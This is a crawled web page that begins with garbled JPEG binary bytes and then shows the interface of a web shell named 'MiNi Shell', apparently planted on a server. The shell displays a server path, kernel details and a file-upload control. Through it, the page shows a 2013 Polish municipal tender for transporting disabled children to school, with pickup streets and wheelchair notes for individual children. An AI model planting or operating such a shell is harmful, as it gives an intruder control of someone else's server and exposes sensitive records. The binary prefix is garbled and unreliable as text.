JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131122/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131122/478504-N-2013.html

<p class="kh_header"><b>Jaktorów: Dowożenie dzieci niepełnosprawnych do szkół w dni nauki szkolnej w  roku 2014</b><br>
<b>Numer ogłoszenia: 478504 - 2013; data zamieszczenia: 22.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jaktorów , ul. Warszawska 33, 96-313 Jaktorów, woj. mazowieckie, tel. 046 8564026, 8564069, faks (046) 855 21 88.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jaktorow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowożenie dzieci niepełnosprawnych do szkół w dni nauki szkolnej w  roku 2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> : Przedmiot zamówienia obejmuje 3 części.
Część I zamówienia
Dowożenie dzieci do Zespołu Szkół im. H. Szczerkowskiego w Grodzisku Mazowieckim, ul. Kilińskiego 21 i z powrotem do domu.
L.p.	Adresy zamieszkania dzieci z których należy je odebrać w celu dowiezienia do szkoły  	Ilość dzieci objętych dowożeniem do szkoły
1	Sade Budy, ul. Krótka .	1
2	Henryszew, ul. Topolowa 	1
3	Bieganów	1
4	Jaktorów, ul. Wojska Polskiego 	1
5	Chylice ,ul. Ogrodowa 	1
6	Jaktorów-Kolonia, ul. Żyrardowska ( dziecko na wózku inwalidzkim)	1
7	Stare Budy 	1
8	Jaktorów -Kolonia ul. Nowowiejskiego	1
9	Budy - Grzybek ul. Platanowa ( dziecko na wózku inwalidzkim)	1
10	Chylice Kolonia ul. Parkowa	2
Razem	11
Dzieci muszą być dowiezione do szkoły w takim czasie aby rozpoczęły zajęcia szkolne punktualnie zgodnie z planem nauczania ale nie wcześniej niż o 7.40.
Odwożenie dzieci do domu po zakończonych zajęciach odbywać się będzie w godz. od 13.30 do 15.00.
W zakresie części I zamówienia limit kilometrów dziennie dla dwóch samochodów wynosi  185 km
Zakłada się, że maksymalna ilość dni nauki szkolnej w okresie zamówienia wynosi 187.
Zamawiający w przypadku wykonywania usługi w zakresie I części zamówienia wymaga od Wykonawcy zapewnienia 2 opiekunów dla dzieci.
Część II zamówienia
Dowożenie dzieci do Specjalnego Ośrodka Szkolno- Wychowawczego w Żyrardowie ul. Środkowa 5.
L.p.	Adresy zamieszkania dzieci których należy je odebrać w celu dowiezienia do szkoły  	Ilość dzieci objętych dowożeniem do szkoły
1	Stare Budy, ul. Sygietyńskiego 	1
2	Budy Zosine k/cmentarza AK	1
3	Stare Budy k/ tartaku ( dziecko nie chodzi jest na wózku inwalidzkim)	1
4	Budy Zosine k. Ośrodka Monar	1
Razem	4
W zakresie Części II zamówienia limit  kilometrów dziennie wynosi 70 km.
Dzieci muszą być dowiezione do szkoły w takim czasie aby rozpoczęły zajęcia szkolne punktualnie zgodnie z obowiązującym planem zajęć ale nie wcześniej niż o godz. 7.30.
Odwożenie dzieci do domu po zakończonych zajęciach odbywać się będzie w godz. od 14.00 do 15.00 
Zakłada się, że maksymalna ilość dni nauki szkolnej w okresie zamówienia wynosi 187 .
 Zamawiający w przypadku wykonywania usługi w zakresie II części zamówienia wymaga od Wykonawcy zapewnienia 1 opiekuna dla dzieci.
Część III zamówienia
Dowożenie dziecka z domu w miejscowości: Sade Budy ul. Bema, do Zespołu Szkół w Warszawie ul. Elektoralna 12/14. Łącznie 1 dziecko.
Dziecko musi być dowiezione do szkoły w takim czasie aby mogło rozpoczynać zajęcia szkolne punktualnie o godz.8.00 nie wcześniej niż o 7.45
Odwożenie dziecka do domu po zakończonych zajęciach odbywać się będzie w godz. od 14.00 -16.00
W zakresie Części III zamówienia limit kilometrów dziennie wynosi 220 km
Zakłada się, że maksymalna ilość dni nauki szkolnej w okresie zamówienia wynosi 187 .
Zamawiający w przypadku wykonywania usługi w zakresie III części zamówienia  wymaga od Wykonawcy zapewnienia 1 opiekuna dla dziecka.
Świadczenie usługi musi odbywać się: 
dla części I zamówienia : dwoma samochodami posiadającymi maksymalnie  (8+1) miejsc każdy,  oznakowanymi, przygotowanymi do przewozu osób niepełnosprawnych  w tym jeden samochód musi być dostosowany do transportu osób poruszających się na wózkach ( 1 miejsce), tj. wyposażonym w szyny do mocowania wózków dla osób niepełnosprawnych oraz rampę lub windę umożliwiającą wjazd wózkiem z osobą niepełnosprawną do samochodu oraz pasy do mocowania wózków, z możliwością dotarcia opiekuna do dziecka potrzebującego pomocy podczas jazdy. 
dla części II zamówienia : samochodem posiadającym maksymalnie  (8+1) miejsc, oznakowanym, przygotowanym do przewozu osób niepełnosprawnych poruszających się na wózku inwalidzkim ( 1 miejsce) , wyposażonym w szyny do mocowania wózków dla osób niepełnosprawnych oraz rampę lub windę umożliwiającą wjazd wózkiem z osobą niepełnosprawną do samochodu oraz pasy do mocowania wózków, z możliwością dotarcia opiekuna do dziecka potrzebującego pomocy podczas jazdy. 
Dla części III zamówienia samochodem oznakowanym, przystosowanym do przewozu osób. 
Zamawiający nie dopuszcza w przypadku żadnej części zamówienia łączenia usługi dowozu dzieci z usługą wykonywaną na rzecz innego Zamawiającego.
Zakres realizacji zamówienia:
1.	Odbieranie dzieci od rodziców lub opiekunów prawnych spod domu lub miejsca wskazanego przez Zamawiającego w obrębie miejsca zamieszkania dziecka, dowóz do szkół specjalnych i ośrodków szkolno - wychowawczych na czas rozpoczęcia zajęć oraz przekazanie pod opiekę osoby upoważnionej przez szkołę,
2.	Zapewnienie pomocy ze strony opiekunów w rozbieraniu i ubieraniu dzieci na terenie szkół specjalnych i ośrodków szkolno - wychowawczych (po dowiezieniu i przed odbiorem  dziecka, gdy zajdzie taka potrzeba),
3.	Odbieranie dzieci od osoby upoważnionej przez szkołę specjalną lub ośrodek szkolno-wychowawczy po zakończeniu zajęć, dowóz pod dom i przekazanie pod opiekę  rodziców lub opiekunów prawnych,
4.	Dyspozycyjność w okresie świadczenia usługi zgodnie z ustalonym harmonogramem, dopuszczającym możliwość nagłych zmian w terminach dowozu, wynikających m. in. ze zwolnień lekarskich dzieci,  choinki, festynu, skrócenia lekcji czy zamknięcia szkoły itp. W takiej sytuacji Wykonawca zostanie powiadomiony przez Zamawiającego,
5.	Kurs nie może być odwołany.
6.	Płynność jazdy, tzn. w przypadku awarii pojazdu uruchomienie natychmiast zastępczego .
7.	Dbałość o czystość oraz o właściwy stan techniczny pojazdów zapewniający odpowiedni komfort jazdy. 
8.	Pracownicy Wykonawcy sprawujący opiekę powinni posiadać przygotowanie do wykonywania podstawowych czynności pielęgnacyjno - opiekuńczych wobec dzieci w czasie przewozu tych dzieci na trasie dom - szkoła - dom. Pracownicy Wykonawcy sprawujący opiekę powinni być wyposażeni w telefony komórkowe. 
Wykonawca ustali optymalny rozkład jazdy, mając na uwadze jak najkrótszy czas przebywania dziecka w podróży, z uwzględnieniem następujących założeń:
a)   Dziecko powinno być dowiezione do szkoły specjalnej/ośrodka szkolno - wychowawczego, w
takim czasie, aby możliwe było rozpoczęcie przez nie zajęć lekcyjnych o czasie i zabieranie dziecka po ich zakończeniu, bez zbędnego oczekiwania,
b) Wstępny harmonogram przewozu dzieci , wykonawca przedstawi zamawiającemu na 14 dni przed
 rozpoczęciem świadczenia usługi będącej przedmiotem zamówienia, 
c) Szczegółowy harmonogram przewozu dzieci  wykonawca przekaże zamawiającemu w terminie 10
dni od rozpoczęcia świadczenia usługi będącej przedmiotem zamówienia, po dokonaniu uzgodnień z dyrektorami poszczególnych szkół specjalnych/ośrodka szkolno - wychowawczego, do których uczęszczają dzieci oraz z  ich rodzicami lub opiekunami prawnymi,
d)  Harmonogram dowozu dzieci musi zawierać:
1) opis trasy,
2) szczegółowe godziny kursów z uwzględnieniem ustaleń o których mowa w punkcie 3,
3) informacje dotyczące:
a) kierowców i opiekunów do obsługi trasy,
b) numeru telefonu komórkowego opiekuna i kierowcy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje  możliwość udzielenia zamówienia uzupełniającego na podstawie odrębnej umowy lub umów zawartych z Wykonawcą w trybie zamówienia z wolnej ręki, na podstawie art. 67 ust. 1 pkt 6 ustawy.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.23.21.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy  w zakresie :
uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania: 
Dla części I, II, III  zamówienia posiadają aktualną na dzień składania ofert licencję zezwalającą na wykonywanie krajowego transportu drogowego osób, zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym ( tekst jednolity Dz. U.  z  2012 r. , poz. 1265  ze zm.)
zamawiający dokona oceny spełnienia warunku na podstawie dokumentów przedłożonych przez wykonawcę metodą: spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części I zamówienia: dysponują dwoma samochodami posiadającymi maksymalnie  (8+1) miejsc każdy,  oznakowanymi, przygotowanymi do przewozu osób niepełnosprawnych  w tym jeden samochód musi być dostosowany do transportu osób poruszających się na wózkach ( 1 miejsce), tj. wyposażonym w szyny do mocowania wózków dla osób niepełnosprawnych oraz rampę lub windę umożliwiającą wjazd wózkiem z osobą niepełnosprawną do samochodu oraz pasy do mocowania wózków, z możliwością dotarcia opiekuna do dziecka potrzebującego pomocy podczas jazdy. 
Dla części II zamówienia: dysponują minimum 1 samochodem posiadającym maksymalnie  (8+1) miejsc, oznakowanym, przygotowanym do przewozu osób niepełnosprawnych poruszających się na wózku inwalidzkim ( 1 miejsce) , wyposażonym w szyny do mocowania wózków dla osób niepełnosprawnych oraz rampę lub windę umożliwiającą wjazd wózkiem z osobą niepełnosprawną do samochodu oraz pasy do mocowania wózków, z możliwością dotarcia opiekuna do dziecka potrzebującego pomocy podczas jazdy. 
Dla części III zamówienia: dysponują minimum 1 samochodem, odpowiednio oznakowanym, przystosowanym do przewozu osób.
zamawiający dokona oceny spełnienia warunku na podstawie dokumentów przedłożonych przez wykonawcę metodą: spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części I zamówienia  dysponują co najmniej 2 opiekunami i co najmniej 2 kierowcami  posiadającymi minimum 3 lata doświadczenia każdy,  odpowiednio w opiece nad osobami niepełnosprawnymi lub  w przewozie osób niepełnosprawnych . 

Dla części II zamówienia dysponują  co najmniej 1 opiekunem i co najmniej 1 kierowcą  posiadającymi minimum 3 lata doświadczenia każdy,  odpowiednio w opiece nad osobami niepełnosprawnymi lub w przewozie osób niepełnosprawnych . 

Dla części III zamówienia dysponują co najmniej 1 opiekunem i co najmniej 1 kierowcą  posiadającymi minimum 3 lata doświadczenia każdy,  odpowiednio w opiece nad osobami niepełnosprawnymi lub w przewozie osób niepełnosprawnych.
zamawiający dokona oceny spełnienia warunku na podstawie dokumentów przedłożonych przez wykonawcę metodą: spełnia/ nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień umowy w stosunku do treści oferty w przypadkach, gdy:
1)	nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, 
2)	nastąpi zmiana przepisów prawa w zakresie podatku od towarów i usług w zakresie przedmiotu umowy prowadząca do podwyższenia całkowitego wynagrodzenia za realizację przedmiotu umowy,
3)	nastąpi zmiana powodująca zmianę wartości zamówienia w przypadku: zmiany rozkładu zajęć szkolnych, trasy.
2.	Strony umowy uznają zasadność wprowadzenia zmian do umowy, a zmiany te nie wywołają niekorzystnych skutków dla Zamawiającego i nie spowodują zmiany oferowanych warunków realizacji zamówienia będących podstawą oceny ofert.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jaktorow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Jaktorów ul. Warszwska33, 96-313 Jaktorów, pok nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2013 godzina 10:00, miejsce: Urząd Gminy Jaktorów ul. Warszwska33, 96-313 Jaktorów, pok nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com